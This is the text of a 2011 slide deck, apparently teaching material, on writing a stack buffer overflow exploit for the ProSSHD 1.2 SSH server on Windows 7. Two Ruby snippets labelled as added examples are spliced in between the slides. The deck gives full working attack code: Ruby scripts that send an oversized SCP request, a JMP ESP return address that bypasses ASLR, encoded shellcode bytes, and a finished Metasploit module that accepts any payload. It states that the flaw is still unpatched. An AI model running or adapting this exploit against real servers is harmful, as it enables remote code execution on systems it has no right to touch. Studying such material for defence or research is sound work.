Real Windows Exploits
Allen Harper



               1
ProSSHD Vulnerability




Binary can be found at: http://www.exploit-db.com/application/11618

STILL NOT FIXED… 0-days still work…



                                                                   2
Install ProSSHD in vmware
•    Set up W7 vmware client, host only mode.
•    Determine vmware client IP.
•    Ping vmware client from host system.
•    Install Demo ProSSHD inside vm, run it.




                                         3
Exploit Development Process
•    Crash Program in Debugger
•    Control EIP (next instruction)
•    Determine Offset of Overwrite to EIP
•    Determine Opcode to return to (new EIP)
•    Determine Space Constraints
•    Select and Test Shellcode
•    Build Exploit Sandwich
•    Determine Bad Characters

                                               4
Immunity Debugger
•  Fork from OllyDbg
•  Still looks and feels like OllyDbg
•  Adds a Python Command Shell
•  Allows for more automation
•  pvefindaddr is a great plugin tool for
   exploit development! http://corelan.be
•  Note: there was a problem with 1.74
•  Current version is 1.80
                                            5
Save Snapshot, Attach Debugger
•    In Vmware, save snapshot (prior to sending)
•    Send Exploit, with Sleep(15) before send
•    File->Attach->wsshd.exe (may need to sort)
•    In debugger, hit F9 to continue process




                                               6
Crash the ProSSHD Server
•  From host, crash remote server, control EIP
  #prosshd1.rb
  %w{rubygems net/ssh net/scp}.each { |x| require x }
  username = 'test1' # need to set this up on the test victim (os account)
  password = 'test1' # need to set this up on the test victim machine
  host = '10.10.10.143'
  port = 22
  # use A's to overwrite eip
  get_request = "\x41" * 516
  # lets do it…
  Net::SSH.start( host, username, :password => password, :port => port) do |ssh|
    sleep(15) # gives us time to attach to wsshd.exe
    ssh.scp.download!( get_request, "foo.txt") # 2 params: remote file, local file
  end

  • Run exploit with ruby prosshd1.rb
  • Attach debugger to wsshd.exe, after it loads, Hit F9 twice



                                                                      7
Determine the Offset(s)
 •  Revert VM, then use Pattern_Create
#prosshd2.rb
%w{rubygems net/ssh net/scp}.each { |x| require x }
username = 'test1' # need to set this up on the test victim (os account)
password = 'test1' # need to set this up on the test victim machine
host = '10.10.10.143'
port = 22
# send the cyclic pattern instead of A's, so the bytes in eip give the offset
get_request =
  "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3A" \
  "c4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8" \
  "Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah" \
  "3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7A" \
  "j8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2" \
  "Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao" \
  "7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq"
# lets do it…
Net::SSH.start( host, username, :password => password, :port => port) do |ssh|
  sleep(15) # gives us time to attach to wsshd.exe
  ssh.scp.download!( get_request, "foo.txt") # 2 params: remote file, local file
end

 •  Run exploit with ruby prosshd2.rb
                                                                    8
Determine the Offset(s)
•  Attach Debugger to wsshd.exe
•  After it loads, hit F9 twice




                                  9
Determine the Offset(s)




                          10
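Added example, not from the deck: the string prosshd2.rb sends is exactly what Metasploit's pattern_create produces, and the offset on these slides comes from locating the four bytes that land in EIP inside that pattern. This Ruby reimplementation (function names are mine) rebuilds the pattern and recovers the 492-byte offset the rest of the deck relies on; the EIP value 0x41347141 used below is the one implied by that offset, since the slide's screenshot is not in the text.

```ruby
# Added example, not from the slides: how the EIP-overwrite offset is
# recovered from the cyclic pattern. Each 3-byte triplet is an upper-case
# letter, a lower-case letter and a digit, with the digit cycling fastest
# (Aa0 Aa1 ... Aa9 Ab0 ...), so any 4 consecutive bytes occur only once.
UPPER  = ('A'..'Z').to_a
LOWER  = ('a'..'z').to_a
DIGITS = ('0'..'9').to_a
MAX_PATTERN = UPPER.size * LOWER.size * DIGITS.size * 3  # 20280 bytes

# Build the first +length+ bytes of the pattern (same text as pattern_create).
def pattern_create(length)
  out = +''
  UPPER.each do |u|
    LOWER.each do |l|
      DIGITS.each do |d|
        out << u << l << d
        return out[0, length] if out.length >= length
      end
    end
  end
  out[0, length]  # pattern exhausted; caller asked for more than MAX_PATTERN
end

# Offset of a 4-byte window in the pattern. The debugger shows EIP as a
# little-endian dword (0x41347141 is the value implied by the deck's 492
# offset, an assumption); pass it as an Integer and it is byte-reversed
# back to the "Aq4A" that sat in the buffer. Returns nil when the value is
# not part of the pattern, i.e. EIP was not overwritten by our data.
def pattern_offset(needle, length = MAX_PATTERN)
  needle = [needle & 0xffffffff].pack('V') if needle.is_a?(Integer)
  pattern_create(length).index(needle)
end

if __FILE__ == $PROGRAM_NAME
  puts pattern_create(500)                      # the string prosshd2.rb sends
  puts "offset: #{pattern_offset(0x41347141)}"  # => 492
end
```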
Determine Op-Codes to Return to
 •  Determine the Control Vector, we could:
   –  JMP ESP
   –  RETN


 •  We choose JMP ESP
 •  Could use msfpescan on ntdll.dll




                                          11
Determine Op-Codes to Return to
 •  Problem: Vista and beyond protect
    NTDLL.DLL with ASLR
 •  Need to find a non-ASLR module
 •  This is the best way to bypass ASLR
 •  pvefindaddr is the tool of choice
 •  Run with !pvefindaddr j -r esp -n in
    ImmDbg
 •  Results in file j.txt:
 •    C:\Users\[your name here]\AppData\Local\VirtualStore\Program Files\
      Immunity Inc\Immunity Debugger\




                                                                           12
Determine Op-Code Address
==================================================================
pvefindaddr v1.32    corelanc0d3r - http://www.corelan.be:8800
-----Loaded modules ----------------------------------------------
Fixup | Base       | Top        | Size       | SafeSEH | ASLR | NXCompat | Modulename & Path
------------------------------------------------------------------
NO    | 0x7C340000 | 0x7C396000 | 0x00056000 | yes     | NO   | NO       | MSVCR71.dll : C:\Users\Public\Program Files\Lab-NC\ProSSHD\MSVCR71.dll
yes   | 0x76210000 | 0x762E4000 | 0x000D4000 | yes     | yes  | yes      | kernel32.dll : C:\Windows\system32\kernel32.dll
yes   | 0x77A50000 | 0x77B8C000 | 0x0013C000 | yes     | yes  | yes      | ntdll.dll : C:\Windows\SYSTEM32\ntdll.dll
<truncated for brevity>
NO    | 0x00400000 | 0x00457000 | 0x00057000 | yes     | NO   | NO       | wsshd.exe : C:\Users\Public\Program Files\Lab-NC\ProSSHD\wsshd.exe
<truncated for brevity>
Found push esp - ret at 0x7C345C30 [msvcr71.dll] - [Ascii printable] {PAGE_EXECUTE_READ} [SafeSEH: Yes - ASLR: ** No (Probably not) **] [Fixup: ** NO **] - C:\Users\Public\Program Files\Lab-NC\ProSSHD\MSVCR71.dll

<truncated for brevity>

                                                                   13
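Added example, not from the deck: a small Ruby audit of the "Loaded modules" table above, the same check a defender (or a vendor) would run to see which modules opt out of the OS mitigations. The rows are constructed from the slide (the real j.txt lists many more), and the function names are mine; the point it makes is that the product ships its own MSVCR71.dll without ASLR or fixups, which is what gives up the protection Vista and later add to ntdll.dll.

```ruby
# Added example, not from the slides: parse the pvefindaddr module table and
# report which modules load at a fixed address and which lack NXCOMPAT.
# MODULE_TABLE is constructed from the slide's rows, paths included.
MODULE_TABLE = <<~'TXT'
  Fixup | Base       | Top        | Size       | SafeSEH | ASLR | NXCompat | Modulename & Path
  ------------------------------------------------------------------
  NO    | 0x7C340000 | 0x7C396000 | 0x00056000 | yes     | NO   | NO       | MSVCR71.dll : C:\Users\Public\Program Files\Lab-NC\ProSSHD\MSVCR71.dll
  yes   | 0x76210000 | 0x762E4000 | 0x000D4000 | yes     | yes  | yes      | kernel32.dll : C:\Windows\system32\kernel32.dll
  yes   | 0x77A50000 | 0x77B8C000 | 0x0013C000 | yes     | yes  | yes      | ntdll.dll : C:\Windows\SYSTEM32\ntdll.dll
  NO    | 0x00400000 | 0x00457000 | 0x00057000 | yes     | NO   | NO       | wsshd.exe : C:\Users\Public\Program Files\Lab-NC\ProSSHD\wsshd.exe
TXT

LoadedModule = Struct.new(:name, :path, :base, :top, :fixup, :safeseh, :aslr, :nxcompat)

# pvefindaddr prints flags as "yes" / "NO"; anything else counts as off.
def flag_on?(field)
  field.strip.casecmp?('yes')
end

# Keep only data rows (they start with the yes/NO Fixup flag) and split the
# pipe-separated columns; the last column is "name : path", so split on the
# first colon only, because the Windows path itself contains one.
def parse_modules(text)
  rows = text.lines.map(&:strip).select { |l| l.match?(/\A(yes|no)\s*\|/i) }
  rows.map do |row|
    fixup, base, top, _size, safeseh, aslr, nx, name_path = row.split('|').map(&:strip)
    name, path = name_path.split(':', 2).map(&:strip)
    LoadedModule.new(name, path, base.hex, top.hex,
                     flag_on?(fixup), flag_on?(safeseh), flag_on?(aslr), flag_on?(nx))
  end
end

# Modules that sit at the same address after every reboot: no ASLR and no
# fixups. One such module in the process is enough to make system ASLR moot.
def fixed_address_modules(mods)
  mods.reject { |m| m.aslr || m.fixup }.map(&:name)
end

# Modules not linked with /NXCOMPAT (the DEP opt-out the deck mentions).
def nxcompat_optout_modules(mods)
  mods.reject(&:nxcompat).map(&:name)
end

# Which module's mapping contains a given address, or nil if none does.
def module_containing(mods, addr)
  m = mods.find { |x| addr >= x.base && addr < x.top }
  m && m.name
end

if __FILE__ == $PROGRAM_NAME
  mods = parse_modules(MODULE_TABLE)
  puts "No ASLR, no fixup : #{fixed_address_modules(mods).join(', ')}"
  puts "No NXCOMPAT       : #{nxcompat_optout_modules(mods).join(', ')}"
  puts "0x7C345C30 lives in #{module_containing(mods, 0x7C345C30)}"
end
```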
Find Space Constraints
•  Crash with 2000 A's, calculate depth of
   buffer
#prosshd3.rb …truncated for brevity…
get_request = "\x41" * 492 + "\x42\x42\x42\x42" + "\x41" * 2000
•  Run, Attach, Crash, inspect stack for buffer size

                         0x0012f758 - 0x0012ef88 = 0x7d0 = 2000

                         So we can fit 2000 bytes of
                         shellcode into the buffer!



                                                        14
Select and Test Shellcode
•  Generate your shellcode (switching to C)
$ msfpayload windows/exec cmd=calc.exe R | msfencode -b '\x00\x0a' -e x86/shikata_ga_nai -t c > sc.txt

•  Take that shellcode and copy paste into the following harness

//shellcode.c
char shellcode[] = //copy paste from above
"\x31\xc0\x31... your shellcode goes here";
int main() {                   // main function
   int *ret;                   // ret pointer for saved ret
   ret = (int *)&ret + 2;      // set ret to point to the saved return address
   (*ret) = (int)shellcode;    // change the saved ret to addr of shellcode
}




                                                                   15
Select and Test Shellcode




Notice: we disabled DEP (/NXCOMPAT)… does not matter here as our vulnerable
program is not linked with /NXCOMPAT by default.

                                                                              16
Build Exploit Sandwich
# prosshd4.rb
%w{rubygems net/ssh net/scp}.each { |x| require x }
username = 'test1'
password = 'test1'
host = '10.10.10.143'
port = 22
# [*] x86/shikata_ga_nai succeeded with size 228 (iteration=1)
shell =
"\xd9\xcc\x31\xc9\xb1\x33\xd9\x74\x24\xf4\x5b\xba\x99\xe4\x93" +
"\x62\x31\x53\x18\x03\x53\x18\x83\xc3\x9d\x06\x66\x9e\x75\x4f" +
"\x89\x5f\x85\x30\x03\xba\xb4\x62\x77\xce\xe4\xb2\xf3\x82\x04" +
"\x38\x51\x37\x9f\x4c\x7e\x38\x28\xfa\x58\x77\xa9\xca\x64\xdb" +
"\x69\x4c\x19\x26\xbd\xae\x20\xe9\xb0\xaf\x65\x14\x3a\xfd\x3e" +
"\x52\xe8\x12\x4a\x26\x30\x12\x9c\x2c\x08\x6c\x99\xf3\xfc\xc6" +
"\xa0\x23\xac\x5d\xea\xdb\xc7\x3a\xcb\xda\x04\x59\x37\x94\x21" +
"\xaa\xc3\x27\xe3\xe2\x2c\x16\xcb\xa9\x12\x96\xc6\xb0\x53\x11" +
"\x38\xc7\xaf\x61\xc5\xd0\x6b\x1b\x11\x54\x6e\xbb\xd2\xce\x4a" +
"\x3d\x37\x88\x19\x31\xfc\xde\x46\x56\x03\x32\xfd\x62\x88\xb5" +
"\xd2\xe2\xca\x91\xf6\xaf\x89\xb8\xaf\x15\x7c\xc4\xb0\xf2\x21" +
"\x60\xba\x11\x36\x12\xe1\x7f\xc9\x96\x9f\x39\xc9\xa8\x9f\x69" +
"\xa1\x99\x14\xe6\xb6\x25\xff\x42\x48\x6c\xa2\xe3\xc0\x29\x36" +
"\xb6\x8d\xc9\xec\xf5\xab\x49\x05\x86\x48\x51\x6c\x83\x15\xd5" +
"\x9c\xf9\x06\xb0\xa2\xae\x27\x91\xc0\x31\xbb\x79\x29\xd7\x3b" +
"\x1b\x35\x1d"
# Overwrite eip with jmp esp (0x7c345c30) of msvcr71.dll
get_request = "\x41" * 492 + "\x30\x5C\x34\x7C" + "\x90" * 1000 + "\xcc" + shell
# lets do it...
Net::SSH.start( host, username, :password => password, :port => port) do |ssh|
  sleep(15) # gives us time to attach to wsshd.exe
  ssh.scp.download!( get_request, "foo.txt") # 2 params: remote file, local file
end


                                                                                    17
Test Exploit with Debugger
•  Run with ruby prosshd4.rb
•  Hit F9 twice to hit breakpoint



•  Hit F9 to Continue, if crash, then bad
   character.


                                            18
Find Bad Characters
  •  Revert VM, resend exploit, step through
  •  Tip 1: right click on halted instruction, follow in dump…




Shellcode is mangled… why? bad char \x0a



                                                         19
Build new Shellcode
# msfpayload windows/exec cmd=calc.exe R | msfencode -b '\x00\x0a\x20' -e x86/shikata_ga_nai -t ruby
# [*] x86/shikata_ga_nai succeeded with size 228 (iteration=1)
shell =
"\x33\xc9\xb1\x33\xbd\xe3\x34\x37\xfb\xdb\xc6\xd9\x74\x24" +
"\xf4\x5f\x31\x6f\x0f\x83\xef\xfc\x03\x6f\xe8\xd6\xc2\x07" +
"\x06\x9f\x2d\xf8\xd6\xc0\xa4\x1d\xe7\xd2\xd3\x56\x55\xe3" +
"\x90\x3b\x55\x88\xf5\xaf\xee\xfc\xd1\xc0\x47\x4a\x04\xee" +
"\x58\x7a\x88\xbc\x9a\x1c\x74\xbf\xce\xfe\x45\x70\x03\xfe" +
"\x82\x6d\xeb\x52\x5a\xf9\x59\x43\xef\xbf\x61\x62\x3f\xb4" +
"\xd9\x1c\x3a\x0b\xad\x96\x45\x5c\x1d\xac\x0e\x44\x16\xea" +
"\xae\x75\xfb\xe8\x93\x3c\x70\xda\x60\xbf\x50\x12\x88\xf1" +
"\x9c\xf9\xb7\x3d\x11\x03\xff\xfa\xc9\x76\x0b\xf9\x74\x81" +
"\xc8\x83\xa2\x04\xcd\x24\x21\xbe\x35\xd4\xe6\x59\xbd\xda" +
"\x43\x2d\x99\xfe\x52\xe2\x91\xfb\xdf\x05\x76\x8a\x9b\x21" +
"\x52\xd6\x78\x4b\xc3\xb2\x2f\x74\x13\x1a\x90\xd0\x5f\x89" +
"\xc5\x63\x02\xc4\x18\xe1\x38\xa1\x1a\xf9\x42\x82\x72\xc8" +
"\xc9\x4d\x05\xd5\x1b\x2a\xf9\x9f\x06\x1b\x91\x79\xd3\x19" +
"\xfc\x79\x09\x5d\xf8\xf9\xb8\x1e\xff\xe2\xc8\x1b\x44\xa5" +
"\x21\x56\xd5\x40\x46\xc5\xd6\x40\x25\x88\x44\x08\x84\x2f" +
"\xec\xab\xd8\xa5"
                                   Good list of bad chars: 00 0a 09 20 21


                                                                               20
Metasploit Decoders
•  Require space on the stack to decode
•  Modules use stackadjustment parameter
•  You may want to add 16 bytes of NOP to
   beginning of payload to be safe.




                                      21
Success!
•    Revert VM to running state
•    Launch Exploit with new shellcode
•    Remove \xcc, replace with \x90, fire off exploit
•    P0wn3d!!!!! Where do you want to go today!




                                                  22
Automating
•  Metasploit as you have seen is an
   excellent tool for both exploit development
   and execution.
•  You should look at existing modules, best
   way to learn techniques.
•  There is no ProSSHD module :(
•  We will create one and automate our
   attack!
                                          23
Metasploit Module Sections
•  Header
•  Initialize Section ( bad chars, targets)
•  Exploit Section (guts of sploit, protocol)




                                           24
Header
##
# $Id: freesshd_key_exchange.rb 9262 2010-05-09 17:45:00Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
%w{rubygems net/ssh net/scp}.each { |x| require x }

class Metasploit3 < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Tcp




                                                                            25
Initialize Section
  def initialize(info = {})
    super(update_info(info,
      'Name'            => 'ProSSHD 1.2.x SCP-GET Buffer Overflow',
      'Description'     => %q{
        This module exploits a simple stack buffer overflow in ProSSHD 1.2.
        This flaw is due to a buffer overflow error when handling a specially
        crafted scp get request from an SSH client.
        **Based on original Exploit by S2 Crew [Hungary]
      },
      'Author'          => 'AAH',
      'License'         => MSF_LICENSE,
      'Version'         => '$Revision: 10000 $',
      'References'      => [],
      'DefaultOptions'  => { 'EXITFUNC' => 'process', },
      'Payload'         => { 'Space'           => 1000,
                             'BadChars'        => "\x00\x09\x0a\x20\x21",
                             'StackAdjustment' => -3500, },
      'Platform'        => 'win',
      'Targets'         => [[ 'Windows 7', { 'Ret' => 0x7c345c30 } ],],
      'Privileged'      => true,
      'DisclosureDate'  => 'March 3, 2010',
      'DefaultTarget'   => 0))
    register_options([
      OptString.new('USERNAME', [ true, 'The username to authenticate as' ]),
      OptString.new('PASSWORD', [ true, 'The password for the specified username' ]),
      Opt::RPORT(22)], self.class)
  end
!



                                                                                           26
Exploit Section
  def exploit
    get_request = "\x41" * 492 +
      [target.ret].pack('V') +
      "\x90" * 1000 +
      payload.encoded # shellcode 8)

    print_status("Trying to connect to #{datastore['RHOST']}...")

    # lets do it...
    Net::SSH.start( datastore['RHOST'], datastore['USERNAME'],
                    :password => datastore['PASSWORD'], :port => datastore['RPORT']) do |ssh|
      #sleep(15) # gives us time to attach to wsshd.exe
      print_status("Sending sploit to #{datastore['RHOST']}...")
      ssh.scp.download!( get_request, "foo.txt") # 2 params: remote file, local file
    end
    handler
  end
end
!




                                                                                     27
Setup
•  Next, install the following rubygems
•  Have to run CygShell as Administrator (on older MSF)
•  Right click on it in start menu, select run as
   Administrator




                                                   28
Run it
•  Restart vulnerable server
•  Run Metasploit Console




                               29
Armitage Demo




                30

2011-03 Developing Windows Exploits
